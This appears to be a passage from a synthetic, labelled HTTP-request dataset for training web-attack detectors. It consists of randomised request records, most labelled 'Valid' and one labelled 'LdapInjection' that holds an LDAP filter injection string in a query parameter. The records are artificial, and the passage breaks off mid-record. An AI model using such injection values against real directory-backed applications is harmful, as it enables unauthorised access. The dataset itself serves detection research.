Authorization: Digest uri=http://ewfe.be/stivoit/q1jlrw/AautZiu.asmx
Range: 58-,2-
Referer: /rowmou/hca7oh.mp3
TE: trailers,gzip;q=0.8,trailers
Trailer: Cache-Control
User-Agent: fYSem8Xw0 http://www.dyni.fr
UA-CPU: MIPS
UA-Disp: 213,6888,8
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 817x4367
Via: FTP/6.8 www.hhehtc.gif:509, 2.4 www.eoap6s.js, FTP/2.4 www.idte.htm
Transfer-Encoding: gzip
Upgrade: aeaae/1.2, oeh0/9.9, asctrd/8.3
Warning: 749 20.33.77.96 "uwiswnsUsono4itdna" "Tue, 24 Jun 08 04:13:34 CET"
X-Forwarded-For: 70.192.139.43
X-Serial-Number: 4557726217620382027
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 15572
Start - Id: 37829
class: LdapInjection
GET /fg/s6escrs/iincludeJkHyHeNxRV/74/LGg/p_LOdPY7c95c/oifonozd/r2t/tnvldE6Hlt/uscitoazehWla.gif?oo0nlsotE=udGXoJlX&LBexD9YBav=uT&Ledem=e8libeh&s5u3o8=2039197&fr8FreEd2onEzt8=0416&E3kWoTgf=498767244&rkitEauO=8lenyn%7Etmps&w8C3outhzagd=ai%29%28++++%7C%28Nui%3D*%29&clonarnwanroese=access_log+z7tace%27so%3Da HTTP/1.1
Host: www.ntEeputl.ch:6416
Connection: tAscbH
Accept: text/*, video/quicktime, text/xml
Accept-Charset: x-mac-hebrew
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: no-cache
Client-ip: 61.159.20.181
Cookie: nklt=asuje;evozecoeqaH=4114211;ae5ns=N;p62egn8rdtefg=tcI6;toncrdbytaquor=2993635350;j9wgetTsS=6526805
Cookie2: $Version="53"
Date: Tue, 25 Mar 08 17:41:28 CET
ETag: "Ob3LephYBYDp-6jiyC"
Expect: 100-continue
From: utTT@sw41.ch
If-Modified-Since: Sun, 11 Jan 04 11:50:34 UTC
If-Unmodified-Since: Thu, 25 May 06 08:04:45 GMT
If-Match: "d4txfOU@YJyxWySk"
If-None-Match: *
If-Range: "EMJqZO.82YVLxrXaLI"
Max-Forwards: 1352
MIME-Version: 6.6
Pragma: eL='i'
Proxy-Authorization: Basic MWU3Ym9hOmx0ZWllam8=
Authorization: Basic bm1Ub3k6b2gxTlJyc2M=
Range: 09106-2,27777-,7807-
Referer: /odin6cee.txt
TE: deflate,trailers,deflate
Trailer: Accept
User-Agent: ehDwQt http://www.hresh.cz
UA-CPU: 68000
UA-Disp: 825,0985,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 2010x029
Via: FTP/5.4 www.aetonsd.htm, HTTP/1.3 www.ttos.png, FTP/7.5 www.OrOnsee.jpeg
Transfer-Encoding: identity
Upgrade: twrizf/4.9, ra8dl/9.5
Warning: 166 78.105.41.24 "sewleo7lheo" "Tue, 16 Jun 09 20:36:56 UTC"
X-Forwarded-For: 178.127.38.107
X-Serial-Number: 839362517955093673
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37829
Start - Id: 25772
class: Valid
GET /aergoeirnosnt/bUzmmDdyaitte.jsp? HTTP/1.1
Host: 69.100.87.1
Connection: reldH
Accept: */*;q=0.5
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: min-fresh=5845
Client-ip: 113.52.228.135
Cookie: VAf5cjXQ=knMltcsrI;b3earHbR=3313260
Cookie2: $Version="44"
Date: Tue, 11 Aug 09 12:17:34 CET
ETag: "EyjWqBCPYTYz_ILh"
Expect: 100-continue
From: adeoanpa@5iod2.de
If-Modified-Since: Fri, 12 Jan 07 02:11:43 CET
If-Unmodified-Since: Mon, 07 Jul 08 12:44:34 UTC
If-Match: *
If-None-Match: *
If-Range: Fri, 13 Apr 07 21:01:03 CET
Max-Forwards: 783
MIME-Version: 0.1
Pragma: no-cache
Proxy-Authorization: NTLM bWxvaGhtdEhmdDB3amhtZXdOc3lHbmpubmd0NGJjVDhhVHM3czRzbDAyWG0=
Authorization: Digest qop=auth
Range: 0846-,55-
Referer: /8abtotv/sStbe/adiqenm/aios8wwN/sgt7ct.cgi
TE: trailers,trailers,chunked;q=0.8
Trailer: Warning
User-Agent: m9RYpYbQZ http://www.8vdSig4t.biz
UA-CPU: PowerPC
UA-Disp: 9911,6209,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 291x574
Via: 2.6 197.127.103.210, FTP/7.9 13.243.49.247, 6.2 210.174.14.21
Transfer-Encoding: compress
Upgrade: wqn/1.7, nvnp/4.1
Warning: 928 4.71.150.181 "eif2TenhunoLoU" 
X-Forwarded-For: 249.109.166.6
X-Serial-Number: 63082151043081
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25772
Start - Id: 27378
class: Valid
GET /hla9J4F-4QF0hrE/hwCncIWo@RI/cteroanha/n1xgna.f3HS1Zd9j.jf.jsp?4RW.8tr4l2=749955 HTTP/1.0
Host: www.hnp4bbebh.it
Connection: mkneld
Accept: */*;q=0.4
Accept-Charset: *;q=0.7
Accept-Encoding: *;q=0.3
Accept-Language: oNoFevf-dtcgt;q=0.9, itpin-sY;q=0.6, n-um, yece3-pectby3r;q=0.9, ear-a;q=0.8
Cache-Control: min-fresh=22
Client-ip: 31.32.159.101
Cookie: hnhTcml9oetSA=2;hel3edterr0=40092685;Hoatqadze7d=psghe
Cookie2: $Version="469"
Date: Mon, 30 Apr 07 10:43:19 GMT
ETag: "IE5_8NbiZpacC3j5t"
Expect: tGbh=sapEia;sijpe=vcd1asm
From: etr2@eeroi.de
If-Modified-Since: Sat, 25 Nov 06 04:09:05 UTC
If-Unmodified-Since: Sun, 02 Sep 07 20:26:21 GMT
If-Match: *
If-None-Match: "8YH_59A4@arPcLPpV"
If-Range: "S_.OgbssaE_LUF9_Y"
Max-Forwards: 126
MIME-Version: 6.5
Pragma: eo='eta'
Proxy-Authorization: NTLM YWVyYXllYW5iMk9lbm1vZWd4ZGVhOHRBbTlyc3F0bHN3aGV1eHB1ZnNhYThzZXRt
Authorization: madif o3i1rq=ums3rdie
Range: 5279-
Referer: http://www.reei.de/2kearvs/amaiotsv/8fmx0ti.gz
TE: trailers
Trailer: Expect
User-Agent: Mozilla/1.4 (Machintosh; U; PPC Mac OS X 7.7; an-ek; rv:3.0.4) Gecko/71408029
UA-CPU: MIPS
UA-Disp: 461,6977,8
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 9698x542
Via: 2.4 www.cezyBe.html
Transfer-Encoding: deflate
Upgrade: uroe/2.4, Rrt/3.7
Warning: 365 216.84.39.69 "lisohq8cHaNasanTe" 
X-Forwarded-For: 93.54.79.26
X-Serial-Number: 32684294
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 27378
Start - Id: 11164
class: Valid
GET /kDMFIo6/5X_5IWbv/G4akOSCgyRw_/dJhatohEsrTasla/ls5eval2.1wG/o3atl@PY4gVUA5k6Pa6_/iIX7EV_Wr0EpEZoDo/k7/InhsPh1owsolnaeDRis/timmwcmcqz3oeot5stqa/hromhsz/nsYL.gif?2rtti=4tiai%3F3erx+f%3F%3Bul&taoe8o4m=3015413703 HTTP/1.0
Host: 33.99.179.83
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: iso-8859-4, shift_jis, x-mac-korean
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 86.6.116.71
Cookie: helI7Tdhfag=nSvx6;.cnf=623104;aymi=020093194;ci3d9v95goaynr=ijew5bw;oMxtef=b4eis
Cookie2: $Version="851"
Date: Sun, 31 Jul 05 12:36:02 CET
ETag: W/"ge@mXiOhyQIIo.KU55"
Expect: seenYno=cada
From: daneee@lheneowi.org
If-Modified-Since: Tue, 31 Aug 04 15:55:13 UTC
If-Unmodified-Since: Sun, 20 Dec 09 15:25:29 UTC
If-Match: *
If-None-Match: "u02W@7APVcgoq9WX"
If-Range: Wed, 20 Apr 05 18:58:51 CET
Max-Forwards: 3
MIME-Version: 0.7
Pragma: 0s7='r'
Proxy-Authorization: Digest response="FF6f55D1baDeb6c2C872bb57B9eB0aDd"
Authorization: NTLM bm90cnJkNmlzcmVocmFvYm5ob3lydG9zbHpzbmlhcmVl
Range: 01809-,9808-,-723
Referer: http://www.rttooa0.biz/Xmvymwe.zip
TE: trailers,gzip,trailers
Trailer: Warning
User-Agent: Mozilla/4.0 (Machintosh; U; Mac OS X 4.1; is-iy; rv:8.9.2) Gecko/49785579
UA-CPU: StrongARM
UA-Disp: 5419,0442,16
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 571x624
Via: 9.9 www.eUqWetn.css:7
Transfer-Encoding: gzip
Upgrade: sma/1.3, wob8L/8.0, olat/7.1, duc/0.2
Warning: 365 157.254.77.1:08 "9zm9b6laeoj5ro7i5hsl" "Fri, 22 Feb 08 19:43:13 CET"
X-Forwarded-For: 199.166.24.178
X-Serial-Number: 98553683859236748
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11164
Start - Id: 32288
class: Valid
GET /aretp/kJb-execJ08C/ss/dRJHwE9YOL_FdG/0havingX.msf?Korqsock_streammEDp1h=lernescd%24%5Bot&leyt=73935&eous=18434&GtT_ObBFm.Xlike=i&edt=121170&vssrr2l=4449030&thnean=7312&ccyrahin=4qmodrt10a&nw=ceTiF1&rfAid=2s&terawcad9isdna=0326753&sttes=45848190&7ezt=386 HTTP/1.0
Host: www.l3mmih.it:95716
Connection: close
Accept: */*;q=0.9
Accept-Charset: *
Accept-Encoding: identity;q=0.0
Accept-Language: *;q=0.9
Cache-Control: only-if-cached
Client-ip: 51.53.237.152
Cookie: oehdaanm= |;cvuofeykst2=kBX;ah2rota=t\uanehp8mLtnx;fdaIre1r=s;;ta5senuarruwTT=7576
Cookie2: $Version="02"
Date: Wed, 08 Sep 04 12:29:20 UTC
ETag: "5PC@hhpJ@Jsu8Oiv"
Expect: 3zih
From: mnonn5h@wlv1.be
If-Modified-Since: Mon, 13 Dec 04 02:38:21 CET
If-Unmodified-Since: Wed, 29 Dec 04 21:29:08 GMT
If-Match: *
If-None-Match: *
If-Range: Fri, 15 May 09 24:47:07 CET
Max-Forwards: 2777
MIME-Version: 9.5
Pragma: le8tefn='nyek'
Proxy-Authorization: eqcroe eh0ts=bnu9dnt
Authorization: orC5 4uen4ieR=bqbG8
Range: -05910,24859-707033
Referer: http://eiqnitz.de/jWeeoai1/btAty.jsp
TE: trailers,trailers,deflate;q=0.5
Trailer: Date
User-Agent: he6lfdrkS6/4.4.1.8.4
UA-CPU: x86
UA-Disp: 096,809,16
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 3225x292
Via: 9.0 18.154.143.137
Transfer-Encoding: 5eehu; resrod7n=jhCbegt
Upgrade: igmn0b/4.9, aorfth/1.2, srr/7.4, mp7/8.9, npq/6.9
Warning: 188 128.175.35.78:84438 "S5oiobSrnbBr6fnyRoo" "Thu, 12 Oct 06 18:58:00 GMT"
X-Forwarded-For: 132.144.23.218
X-Serial-Number: 7859774427
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 32288
Start - Id: 1765
class: Valid
GET /zvp0Rf8AokBNfNpteE/gwS_KBkGejjsZIvSPo/tdjiY9QA/tc/AGGacceptetc-96lib0/iBgCZ6744D/1iwic1sAVbhuaftm/gV4SlB.nsf?NbetweenH_Y8LOBbin=7604&rztPitptneih=hyettoel%3Btdh&4Eocsdocument4nph-8r=nat&ecdFe=aEopondocument&na9cymeeecn5es=dNj5+&gk=80&4h5rftax=t7tutCnSsauin&kf.S19%uDG6=t8rcchr4es&oofo1yhahrerutp=n-Cninclude9a%29ee&Uotcto=1349440018&tnel=++1%2FjoN%3F&rbfNSelueersyOn=nndfolx4ws HTTP/1.1
Host: www.ethmsI.be
Connection: s2oottee
Accept: */*;q=0.8
Accept-Charset: x-mac-turkish, windows-1251;q=0.8
Accept-Encoding: *;q=0.3
Accept-Language: eso-p, ts6yuhb-ie;q=0.0, 8i-sen1anor;q=0.9, tbnte-sanl9c, shsosmh-aap
Cache-Control: no-cache
Client-ip: 80.173.254.54
Cookie: 6ssptat=1864;wkantacotcd2Ca4=ibinD;nb=ud<et)n[&
Cookie2: $Version="36"
Date: Sun, 13 Jan 08 23:59:58 CET
ETag: W/"7GnAgn5dfI2h2vH5"
Expect: 8RdKw
From: n9mf@hcs9solg.ch
If-Modified-Since: Mon, 11 Sep 06 14:18:27 UTC
If-Unmodified-Since: Sat, 04 Feb 06 22:09:39 UTC
If-Match: *
If-None-Match: "yxPie0eLu8mwBLr2j5"
If-Range: Fri, 16 Oct 09 08:29:45 CET
Max-Forwards: 123
MIME-Version: 3.4
Pragma: no-cache
Proxy-Authorization: Digest algorithm=MD5
Authorization: NTLM RXBldG1hemFldHVvNm5uNDhwZW9hdWVzb2l0ZXljVHRidGg=
Range: 2506-
Referer: http://sunyDooO.fr/nhirizH/oiht/8rinbsm.tar
TE: trailers,gzip
Trailer: Accept
User-Agent: tfscoie8 (a-.GLa; aGwSY.oy)
UA-CPU: PowerPC
UA-Disp: 8023,517,8
UA-OS: WinNT
UA-Color: color8
Via: 3.3 www.4fmtthod.jpeg:0
Transfer-Encoding: jnEek; nitnOP=ssere3Ma
Upgrade: idOaS/2.5, htun/6.1, alo/1.0, cCe/9.8
Warning: 139 78.74.97.56:3343 "baAves6intsOfariudt" "Tue, 24 Nov 09 11:16:38 GMT"
X-Forwarded-For: 162.29.213.245
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1765
Start - Id: 29708
class: Valid
GET /ldt7xleosof4sahaveb7/sIkwvDtPg/.9vbscriptHapositionOXo_e2/lM0QchFCe/havingGa.js?d1oInRg0htmz=92&jhi=nir7i6iakdudfse&hi8E=eN-&hgrhnmtjteg=8 HTTP/1.1
Host: 166.206.137.238
Connection: close
Accept: application/rtf, application/*, text/plain;q=0.7
Accept-Charset: *;q=0.3
Accept-Encoding: *
Accept-Language: chtnttvb-Or7o, emmyn-d0tnel
Cache-Control: no-transform
Client-ip: 39.47.126.79
Cookie: css=iUOsH-5
Cookie2: $Version="5"
Date: Sat, 02 Jun 07 19:21:34 UTC
ETag: W/"_aRgGme7GWHFHjX0kj81"
Expect: zojseoE=aet1tis;9eih
From: nonai@Twda.it
If-Modified-Since: Sat, 05 Dec 09 12:24:30 GMT
If-Unmodified-Since: Fri, 23 Jan 09 18:33:35 GMT
If-Match: *
If-None-Match: "UH1Pf7JnluWqfPmiSB"
If-Range: "1WYGBy7gw89BwmH6cRK"
Max-Forwards: 113
MIME-Version: 3.1
Pragma: no-cache
Proxy-Authorization: Basic d2NpZnRyeTpvdFVnZWxocw==
Authorization: Digest qop=oarcn9
Range: 9-,389285-36,73142-
Referer: http://anzhnh.st/tc7oK/yasi/fhl7fEia.html
TE: trailers,trailers
Trailer: Accept
User-Agent: Mozilla/4.2 (X11; U; Open BSD i586 7.4; dm-dp; rv:7.7.8) Gecko/49310146
UA-CPU: MIPS
UA-Disp: 0925,6962,16
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 502x1724
Via: 1.7 172.136.29.209:470, FTP/4.9 56.74.174.48:99
Transfer-Encoding: identity
Upgrade: vrrI/0.0, oil/4.0, lsbw/0.1, trTad/4.7
Warning: 839 www.Adlc.css "l0hFhseecnn" 
X-Forwarded-For: 25.252.143.178
X-Serial-Number: 2911766071168
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 29708
Start - Id: 19554
class: Valid
GET /Rqnetcate7WgNash/FmadaklnteatE/eX-KBUKQ2r4JaC0L/tqnXGuO9VdXBw6ku-v1s/nsanyesnT/d1fiPwfw2-FkUY73beS/1-a/nTfsg7/dacgaeTe0jeead8es9Hh/rksMvjpD_W.iY1a.html?0ec=andoonetfh&itvids=7634 HTTP/1.0
Host: 190.119.227.171
Connection: keep-alive
Accept: image/gif
Accept-Charset: *
Accept-Encoding: gzip;q=0.8, identity;q=0.7
Accept-Language: *;q=0.5
Cache-Control: max-stale
Client-ip: 250.119.116.105
Cookie: x1tcec=766;m8rhb5tcioD7ity=tmp+camis>Streisd
Cookie2: $Version="5"
Date: Wed, 15 Apr 09 24:12:39 GMT
ETag: "pwhBmkWUsY.qmAUm8"
Expect: emeCt
From: ogeen@6fmx.ch
If-Modified-Since: Thu, 20 Sep 07 06:09:31 GMT
If-Unmodified-Since: Sun, 27 Feb 05 06:10:47 CET
If-Match: *
If-None-Match: "SCoj_9sYDwa9JMEYxWI"
If-Range: Wed, 14 Jun 06 11:58:55 CET
Max-Forwards: 23
MIME-Version: 8.6
Pragma: no-cache
Proxy-Authorization: Houyig La3tes=eueu9ake
Authorization: NTLM Q3loZ3RobW9yZGk4ZnpzbjlSU2lncGRzb3NhaWVpd210bmxpYTllZg==
Range: 156-,0-
Referer: /ioweat/hsmdinsr.asmx
TE: chunked;q=0.5
Trailer: Date
User-Agent: aleib6ec2/9.0
UA-CPU: MIPS
UA-Disp: 3027,9526,32
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 690x0416
Via: 2.1 246.214.176.226, FTP/2.6 www.nnRau.html, FTP/4.7 178.153.110.117
Transfer-Encoding: compress
Upgrade: blY3i/9.6
Warning: 802 110.29.94.224 "lAaytl0aamiAkestm" 
X-Forwarded-For: 194.75.244.233
X-Serial-Number: 519180287127088913
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 19554
Start - Id: 20296
class: Valid
GET /lBx5CAf@kMAjqagm/nlia/okboot.iniMDw-idq1aXW-Z/pmochaP@atXstyleqcLD/6daafw.gif?itsaRea=eaoiqunjeM&asnp=eaTttsi HTTP/1.1
Host: www.mmtor58.fr:4028
Connection: keep-alive
Accept: audio/basic;q=0.7, image/gif
Accept-Charset: *
Accept-Encoding: *
Accept-Language: tncelsgn-e
Cache-Control: only-if-cached
Client-ip: 235.128.217.246
Cookie: n2eattteLce=ra;jeiaas=334
Cookie2: $Version="4"
Date: Thu, 25 Jan 07 11:35:27 UTC
ETag: W/"idK2rQ563WzVLVCFlS"
Expect: tetn18re=iUidv
From: l7liin@ale3msnh.uk
If-Modified-Since: Mon, 05 Jun 06 16:40:32 CET
If-Unmodified-Since: Thu, 22 Mar 07 05:57:26 UTC
If-Match: *
If-None-Match: *
If-Range: Thu, 16 Apr 09 11:05:10 GMT
Max-Forwards: 258
MIME-Version: 5.4
Pragma: Nn=etSels
Proxy-Authorization: Basic ZTI4bzplZXN0
Authorization: Digest username="velhSN0n"
Range: 8-31,-2,-9878
Referer: /eeciea/chrl/9atinos/4e29ooe/Bdmuuo.sh
TE: chunked;q=0.3,trailers,deflate;q=0.0
Trailer: Transfer-Encoding
User-Agent: itnr/2.6.2.3.6
UA-CPU: PowerPC
UA-Disp: 4132,883,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 0564x652
Via: 5.6 www.Eatet.tiff
Transfer-Encoding: compress
Upgrade: eCc/4.2, tne/4.8, kdeqH/8.0
Warning: 569 www.tlhiuw.shtml "elwtdywe4Thero" 
X-Forwarded-For: 97.185.253.211
X-Serial-Number: 11361465282
----: -------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 20296
Start - Id: 13222
class: Valid
GET /axkcmuizOg4IC/tdi1poo/aOU5jL0O@ivihOzUMa7/NdsssjlTi9smodnmohti/hlgrOeSee3b5rt1sue/9EEkicfix0uOh2/nHAQHMWiVXt.jpeg?jjfv=%7Cgay%2Fra2%3Bhme&umMTsue6jq=90&nb9=l8.d7&haztdUoseeeres=r&eapheytd=3&tl=796&hm=7668442&radrn=afmian3bSbem2eeat&taeoucm5sr=65442128&wV-L9Gx57D=46869&5dsw=tDdes&3bnybpubb=Oio7ERo HTTP/1.0
Host: 56.10.7.168
Connection: ma0y
Accept: image/jpeg, audio/basic;q=0.5, application/*
Accept-Charset: *;q=0.1
Accept-Encoding: 
Accept-Language: v-mn7, GienoTe-rn;q=0.2, aahod-egsh4;q=0.2
Cache-Control: only-if-cached
Client-ip: 101.47.238.67
Cookie: Nllglf5gma=8169;FHV_P=pro
Cookie2: $Version="212"
Date: Mon, 03 Sep 07 16:31:03 UTC
ETag: "ZANmXnakMXp8cfOM7"
Expect: dIf3ftsh=cioiNli;Khkkl7n
From: mmi5dv@7cu5saas.com
If-Modified-Since: Wed, 26 Dec 07 08:30:14 CET
If-Unmodified-Since: Sat, 14 Apr 07 10:25:46 UTC
If-Match: *
If-None-Match: "H0PM2KVhESgX2JIvrO"
If-Range: "LlsmkJeUpulMj7cRyo8"
Max-Forwards: 7
MIME-Version: 4.3
Pragma: oNttszfO=rlpaao
Proxy-Authorization: NTLM Z291M0xhdmFvaXR0bzFhdG5ubHF5OWVqaWlvbjY0bW1hZzE0cmE=
Authorization: fewgtP rbEh0=uese
Range: 781398-
Referer: http://www.wnZaatat.cz/xfeha/hhit/sHqhLc.pl
TE: gzip,gzip
Trailer: Accept-Charset
User-Agent: Mozilla/2.7 (X11; U; Open BSD i386 7.6; ya-n8; rv:0.5.7) Gecko/83118776
UA-CPU: Sparc
UA-Disp: 2503,069,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 662x8699
Via: 3.6 www.ymjMroE.tiff, 7.3 www.edlewztl.shtml
Transfer-Encoding: compress
Upgrade: tsts/0.5, eao/0.4, t6o/4.1, 2ibk/6.8, ihsqE/6.1
Warning: 804 52.198.77.145:821 "g3zj2ao" 
X-Forwarded-For: 112.1.79.197
X-Serial-Number: 4810868204268
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 13222
Start - Id: 5282
class: Valid
POST /e0nYStectkttfyhieT/moc7/Wl@1HLxRh/X9KxiC.msf? HTTP/1.1
Content-Length: 362
Content-Language: xeY
Content-Encoding: gzip
Content-Location: /ei3nl4t.php4
Content-MD5: U3NlY0lhYVJlbHJraFR5dg==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 25 Aug 06 20:35:39 UTC
Last-Modified: Tue, 11 Mar 08 13:52:36 CET
Host: 91.118.208.10:592
Connection: close
Accept: */*;q=0.2
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: no-store
Client-ip: 125.203.178.102
Cookie: iecrH1nlne=tn?s0;phn=oIc4LJo5
Cookie2: $Version="82"
Date: Tue, 05 Aug 08 04:30:34 UTC
ETag: "TiPtZqe-ErUpLYpGLK7c"
Expect: aoyzi
From: rpfz@tmadFbssh.cz
If-Modified-Since: Sat, 11 Sep 04 10:59:17 CET
If-Unmodified-Since: Fri, 02 May 08 02:25:40 UTC
If-Match: "AK0-9pAq1bF83zyeg_c0"
If-None-Match: *
If-Range: Fri, 07 Apr 06 02:15:04 CET
Max-Forwards: 5
MIME-Version: 9.9
Pragma: ete0noy='hibfgQ'
Proxy-Authorization: aghv eebTs=nisatc
Authorization: NTLM b25iZEFuSWVheW1ybmV3clJsbGVsMWFpMnJhYVRyY0hobzByc25jb2hUZWV0aA==
Range: 44-,39-,850121-
Referer: http://www.kp6eHt.cz/nSilnd/hzlu.bin
TE: chunked
Trailer: If-Range
User-Agent: rrcesex4fryeib6c
UA-CPU: PowerPC
UA-Disp: 507,781,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 4414x768
Via: HTTP/4.7 www.vtiLHest.js, 3.9 241.246.250.19:08841
Transfer-Encoding: 0fjsLc
Upgrade: ehpx5/0.0, arxncn/6.5, nwer/0.3, shn/9.2, otna/5.5
Warning: 731 183.237.250.141:0 "tuteLitohsstoT" 
X-Forwarded-For: 178.75.102.4
X-Serial-Number: 811738271596
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

6servicesGN@qtmplinkYd=y;system&jI0Rsg.8mailBmy=e@-RcLyHfscH&srmnteb=ri3nbkom&tt0eiaNd=jEsposition&aeCoidaEAso=tVWHAo2ex4r&TRSrpositionvm2=Anthm5t  eta&n3erchogeauhtpe=suaiw&iaHsaat9dh=eiR8emsE8r2th&inputtydNmj7=h)eaunion[kdo ;;0int&wyOrhnsthynoaci=225172&NimuaIti=819&PlQLJqUserviceswinnt5=rxxdfI&cEetnco2t3aiE=]:anscriptnetcataxtermhiinIy&Tai=E

End - Id: 5282
Start - Id: 14595
class: Valid
GET /Bn/eDXMDH7BTkJrftI/6cDysHyMTr/08_.vBAvpositionT0T9/ma/uaajfiloeye6fp.swf? HTTP/1.1
Host: www.uincM.org:84327
Connection: inah
Accept: application/postscript;q=0.1
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: min-fresh=768
Client-ip: 24.117.75.187
Cookie: eegraGEx8e=3<os'aA;heghpLanti=h/aaLlibrri;ElocationFperlfmcatY=72
Cookie2: $Version="819"
Date: Thu, 19 Mar 09 06:53:28 CET
ETag: "MYbLbQIZA_7fSoUgb@IW"
Expect: 100-continue
From: es2ntogi@en5eitt1.de
If-Modified-Since: Thu, 05 Jun 08 09:53:07 CET
If-Unmodified-Since: Sun, 06 Jan 08 20:32:06 UTC
If-Match: *
If-None-Match: "QZVHf70Mhe_7M0yfwO"
If-Range: *
Max-Forwards: 1
MIME-Version: 0.7
Pragma: no-cache
Proxy-Authorization: H5bm be3dbise=tmssi
Authorization: Digest cnonce="lzez3Cna"
Range: 45-4785,-21867,70176-3030
Referer: http://atuoO.be/mphiyem/l6omtwrh/udkmtf.jsp
TE: trailers,trailers
Trailer: User-Agent
User-Agent: Mozilla/9.6 (Machintosh; U; PPC 6.1; pc-EU; rv:5.2.8) Gecko/25528521
UA-CPU: Sparc
UA-Disp: 1652,237,16
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 170x0772
Via: me2/6.8 www.ohoth.png, 3.6 www.hnsnysdq.jpg, 5.2 104.189.212.183:162
Transfer-Encoding: deflate
Upgrade: aAup/3.4, wlhsoh/9.7, nbao/4.6
Warning: 070 www.7a8dwsii.html "svtOooelCswy" "Tue, 02 Mar 10 22:43:31 CET"
X-Forwarded-For: 214.165.29.201
X-Serial-Number: 12480
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 14595
Start - Id: 5653
class: Valid
PUT /aerrtei5nETdnrhz/autoexecxBEAv/sotitnrnra/cevu5dirsttcoootf2/kdswpEEMSP90An3K/ijZw.Ct8r/tfdoe/bhhlwo/3tS.shtml? HTTP/1.1
Content-Length: 141
Content-Language: m2siUa,nF,n
Content-Encoding: gzip
Content-Location: http://dd0e.de/Sehee/iias/lT28E/2tri/lridnp.mpg
Content-MD5: akxzZmVlbk9lb3pabkRzbg==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 22 Feb 08 13:50:53 CET
Last-Modified: Mon, 23 May 05 18:24:24 UTC
Host: 164.49.103.208
Connection: trtce
Accept: audio/*
Accept-Charset: *
Accept-Encoding: *;q=0.1
Accept-Language: *
Cache-Control: max-age=86419
Client-ip: 154.223.89.37
Cookie: OdxqF=LOtak;peeT=93193;e4mH1oEtwrgctAp=482495;yj=rdapuj;seos=9uaggssa
Cookie2: $Version="544"
Date: Sat, 19 Jul 08 23:23:44 CET
ETag: "T.Pqqa6LYnln5XMdH"
Expect: bmwi
From: ncfnnd3s@pjasfsran.gov
If-Modified-Since: Thu, 20 Jan 05 04:21:09 UTC
If-Unmodified-Since: Sat, 05 Aug 06 11:06:52 GMT
If-Match: "Qg@JdowGRdiQv0-kQoC"
If-None-Match: "9P3tQg4Cz8pk30taXGiY"
If-Range: Sat, 17 Jun 06 05:58:57 UTC
Max-Forwards: 690
MIME-Version: 0.1
Pragma: no-cache
Proxy-Authorization: NTLM YTNiNG85bHJpc2VlZ0FtMDlBcnNsbld6dW9sZXRobmg5bA==
Authorization: Digest qop=auth
Range: 8237-7,80-5013
Referer: /lRwlt/v34t7mb.jpg
TE: trailers
Trailer: Authorization
User-Agent: 7ianlihgsmc
UA-CPU: StrongARM
UA-Disp: 1912,4963,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 129x5543
Via: HTTP/6.8 www.erhix.htm
Transfer-Encoding: identity
Upgrade: nHtj/5.7, henx/4.4
Warning: 299 182.237.115.10 "ehssVhw" 
X-Forwarded-For: 93.141.115.142
X-Serial-Number: 59672
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

ebE0=woilogdroecWx&VqSRt77GfN4=Zam&dieLeoreal=3191164&aNEiaya3tine=catTo&eE8HO4Tdeetrecc=5763002812&processing-instruction54WdFNrF6Y=csrreod9

End - Id: 5653
Start - Id: 5376
class: Valid
PUT /2D4L3/eFeH.AZmWcl9QOi/jyUrJahKOOkngSZ/z4k4futl8bsn/ftpuQ493JslibL/e_/1OmNSWQQOVYO/uooiHSWRQpJXpAbtl@m/d@3avHLip7o_To/ett36cyrrl/re4.aspx? HTTP/1.0
Content-Length: 40
Content-Language: hvArtUdg,tmou,seuwd
Content-Encoding: deflate
Content-Location: http://www.s5gorO.gov/liareo/od5iJ/sas2ysiz/lWswoHe/tth5.asp
Content-MD5: bzdpTXBpVHNjc3l0YW9vbw==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 29 Aug 04 22:38:11 GMT
Last-Modified: Sat, 30 Jan 10 24:31:01 UTC
Host: 74.29.253.182
Connection: keep-alive
Accept: */*;q=0.2
